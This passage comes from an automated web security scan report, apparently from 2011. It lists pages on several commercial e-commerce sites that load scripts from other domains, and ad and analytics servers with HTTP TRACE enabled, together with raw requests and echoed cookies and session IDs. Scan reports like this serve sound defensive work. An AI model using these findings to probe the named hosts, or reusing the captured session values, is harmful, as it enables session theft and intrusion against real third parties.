User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 27188
Content-Type: text/html
Set-Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00; expires=Tue, 06-Dec-2011 08:00:00 GMT; path=/
Set-Cookie: casestudiesID=3; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.324. http://www.tenzing.com/cloud/cloud-pricing.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /cloud/cloud-pricing.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud/cloud-pricing.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/sitemap.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; casestudiesID=4; __unam=d5ad7d-1324070db49-4656e66c-3; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.3.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 37219
Content-Type: text/html
Set-Cookie: casestudiesID=2; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.325. http://www.tenzing.com/cloud/sign-up-now.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /cloud/sign-up-now.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cloud/sign-up-now.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/cloud/cloud-pricing.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; casestudiesID=0; __unam=d5ad7d-1324070db49-4656e66c-4; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.4.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 34304
Content-Type: text/html
Set-Cookie: casestudiesID=1; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.326. http://www.tenzing.com/hosting-solutions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /hosting-solutions.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /hosting-solutions.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: casestudiesID=2; CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; __unam=d5ad7d-1324070db49-4656e66c-1; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.1.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 19991
Content-Type: text/html
Set-Cookie: casestudiesID=2; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.327. http://www.tenzing.com/sitemap.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /sitemap.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /sitemap.asp HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/hosting-solutions.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000; ASPSESSIONIDSQAASASC=AEAGBDOCLFNPHENCHFPNGPGD; casestudiesID=3; __unam=d5ad7d-1324070db49-4656e66c-2; __utma=256701838.291308733.1315341131.1315341131.1315341131.1; __utmb=256701838.2.10.1315341131; __utmc=256701838; __utmz=256701838.1315341131.1.1.utmcsr=PG0008-ATG-Solutions|utmccn=001|utmcmd=PPC|utmctr=%20ATG%20%20solutions|utmcct=01

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 21684
Content-Type: text/html
Set-Cookie: casestudiesID=4; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</script>
   <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

20.328. http://www.volusion.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.volusion.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g HTTP/1.1
Host: www.volusion.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
X-Powered-By: ASP.NET
Content-Length: 30981
Content-Type: text/html
Cache-control: private
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<body id="home" class="home">
<script src="//a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="//a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"src="//www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

20.329. http://www.volusion.com/a1/f/OpenSans-Regular-webfont.woff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.volusion.com
Path:   /a1/f/OpenSans-Regular-webfont.woff

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /a1/f/OpenSans-Regular-webfont.woff HTTP/1.1
Host: www.volusion.com
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQBARQSB=POOOFPOCKKGLAGPPGLMHICIP

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
X-Powered-By: ASP.NET
Content-Length: 23126
Content-Type: text/html
Cache-control: private
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<body id="Volusion" class="Volusion">
<script src="//a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="//a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"src="//www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

20.330. http://www.volusion.com/a1/f/OpenSans-Semibold-webfont.woff

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.volusion.com
Path:   /a1/f/OpenSans-Semibold-webfont.woff

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /a1/f/OpenSans-Semibold-webfont.woff HTTP/1.1
Host: www.volusion.com
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQBARQSB=POOOFPOCKKGLAGPPGLMHICIP

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:34:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR ADM TAIo PSA PSD IVA CONi TELo OUR DEL SAM OTR LEG UNI"
X-Powered-By: ASP.NET
Content-Length: 23126
Content-Type: text/html
Cache-control: private
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com
...[SNIP]...
<body id="Volusion" class="Volusion">
<script src="//a248.e.akamai.net/www.volusion.com/a1/js/jquery-1.3.2.min.js" type="text/javascript"></script>
...[SNIP]...
<![endif]-->

<script src="//a248.e.akamai.net/www.volusion.com/a1/js/js_all_min01.js?4" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"src="//www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

20.331. http://www.youtube.com/embed/kPJh9FWuOks

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/kPJh9FWuOks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /embed/kPJh9FWuOks?rel=0&hd=1 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:40:07 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 18441
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>A Look Inside BigCommerce (We&#39;re Hiring!) - YouTube</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css">



...[SNIP]...
</div>


<script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vflXhboHY.js"></script>
...[SNIP]...

20.332. http://www.youtube.com/embed/oxqAPZmFSUU

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /embed/oxqAPZmFSUU

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /embed/oxqAPZmFSUU HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=f_pXTnp7lsc; PREF=fv=10.3.183

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:40:07 GMT
Server: Apache
X-Content-Type-Options: nosniff
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 18327
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>The BigCommerce SEO Song - YouTube</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflIi8lfi.css">


</head>
<body>

<div
...[SNIP]...
</div>


<script src="//s.ytimg.com/yt/jsbin/www-embed_core_module-vflXhboHY.js"></script>
...[SNIP]...

20.333. http://www.znode.com/znode-multifront/architecture.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.znode.com
Path:   /znode-multifront/architecture.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /znode-multifront/architecture.aspx HTTP/1.1
Host: www.znode.com
Proxy-Connection: keep-alive
Referer: http://www.znode.com/znode-multifront/feature.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=tya5ccuuq2iifp45k0an0045; referer_domain=www.google.com; referer_query=?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio; Tracking_Id=1404119; __utma=58486625.433211037.1315341123.1315341123.1315341123.1; __utmb=58486625.2.10.1315341123; __utmc=58486625; __utmz=58486625.1315341123.1.1.utmgclid=CLLul7r4iKsCFQVrgwodzysJ5Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; visitor_id1852=191471275

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:40:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 64975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_ctl00_Head1"><title>
   Ecommerce Architecture | S
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...

20.334. http://www.znode.com/znode-multifront/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.znode.com
Path:   /znode-multifront/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /znode-multifront/default.aspx?pi_ad_id=7270542494&gclid=CLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1
Host: www.znode.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 102934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_ctl00_Head1"><title>
   ASP.NET Ecommerce Shopping
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...

20.335. http://www.znode.com/znode-multifront/feature.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.znode.com
Path:   /znode-multifront/feature.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /znode-multifront/feature.aspx HTTP/1.1
Host: www.znode.com
Proxy-Connection: keep-alive
Referer: http://www.znode.com/znode-multifront/default.aspx?pi_ad_id=7270542494&gclid=CLLul7r4iKsCFQVrgwodzysJ5Q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=tya5ccuuq2iifp45k0an0045; referer_domain=www.google.com; referer_query=?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio; Tracking_Id=1404119; __utma=58486625.433211037.1315341123.1315341123.1315341123.1; __utmb=58486625.1.10.1315341123; __utmc=58486625; __utmz=58486625.1315341123.1.1.utmgclid=CLLul7r4iKsCFQVrgwodzysJ5Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio; visitor_id1852=191471185

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78429


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head id="ctl00_ctl00_Head1"><title>
   Ecommerce Storefront Softw
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.1/swfobject.js"></script>
...[SNIP]...

21. TRACE method is enabled
There are 36 instances of this issue:

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


21.1. http://1215.ic-live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1215.ic-live.com
Path:   /

Request

TRACE / HTTP/1.0
Host: 1215.ic-live.com
Cookie: f0d12587dfbae9d

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 16:45:56 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from i2a-coll-7
X-Cache-Lookup: NONE from i2a-coll-7:80
Via: 1.0 i2a-coll-7:80 (squid/2.6.STABLE21)
Connection: close

TRACE / HTTP/1.0
Host: 1215.ic-live.com
Cookie: f0d12587dfbae9d; ngx_userid=50.23.123.106:1315327539133; cvt586=106159628; ngx_106159628=2011-09-06:09:45:39; cvt522=33083100; ngx_33083100=2011-09-06:09:45:44; sid1460=1315327539qIJ0arLZTDmI99; pid2=1315301244rR4cN0
...[SNIP]...

21.2. http://ads1.msn.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads1.msn.com
Cookie: 45bbf1c8509a4b1e

Response

HTTP/1.1 200 OK
Server: Footprint 4.8/FPMCP
Mime-Version: 1.0
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Type: message/http
Content-Length: 593
Expires: Tue, 06 Sep 2011 15:00:14 GMT
Connection: close

TRACE / HTTP/1.0
Host: ads1.msn.com
Cookie: 45bbf1c8509a4b1e; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MC1=V=3&GUID=27de0d4a057a405d855bc5c261d99b62; mh=MSFT; CC=US; Sample=43; CULTURE=EN-US; expid=id=c3d56ab0e9ef4d31a12e4ebc6c4c7324&bd=2011-08-25T22:26:18.658&v=
...[SNIP]...

21.3. http://afe.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: afe.specificclick.net
Cookie: 7a4ab0de0301eb37

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 130
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

TRACE / HTTP/1.0
host: afe.specificclick.net
cookie: 7a4ab0de0301eb37; JSESSIONID=f3fe521e99c2f212b60492987a2d; ADVIVA=NOTRACK

21.4. http://c.statcounter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 59057598fa4b9e9c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:45 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: c.statcounter.com
Cookie: 59057598fa4b9e9c; is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0


21.5. http://cache.specificmedia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cache.specificmedia.com
Cookie: f53e197770403d15

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:07 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n18 ( origin>CONN)
Content-Length: 347
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
host: ads.specificmedia.com
user-agent: Mozilla/5.0 (compatible; Panther)
accept: */*
via: 1.1 lax-agg-n18.panthercdn.com PWS/1.7.3.3
